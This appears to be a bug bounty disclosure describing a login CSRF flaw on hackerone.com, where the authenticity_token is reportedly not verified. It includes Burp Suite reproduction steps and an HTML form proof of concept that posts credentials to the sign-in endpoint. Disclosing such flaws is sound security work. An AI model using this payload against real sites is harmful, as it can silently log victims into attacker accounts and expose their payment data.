Login CSRF vulnerability on hackerone.com

###Summary Hi. We found a CSRF token bypass on the Hacker One login page. So, this report describes Hacker One login CSRF Token Bypass. ###Exploitation process Hacker One uses the authenticity_token token during login to prevent CSRF. However, the authenticity_token token is not properly verified, so an attacker can log in via CSRF without the authenticity_token token. In other words, Hacker One thinks that it implemented CSRF token through authenticity_token token, but it is not. ###Steps To Reproduce 1. Go to `https://hackerone.com/users/sign_in` 2. While logging into your account, grab packets through the buff suit. 3. Take the HTML code format from burp suite -> Engagement Tools -> Generate CSRF POC. 4. Delete the authenticity token. 5. Forward the request and CSRF exploited successfully and the modified data changed successfully :) ###PoC ```javascript <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://hackerone.com/users/sign_in" method="POST"> <input type="hidden" name="user[email]" value="youremail" /> <input type="hidden" name="user[password]" value="yourpassword" /> <input type="hidden" name="user[remember_me]" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ## Impact The victim may add sensitive payment information to the attacker's new account {F765737} the victim's IP may be recorded in the attacker's account, resulting in brute force and identity theft. █████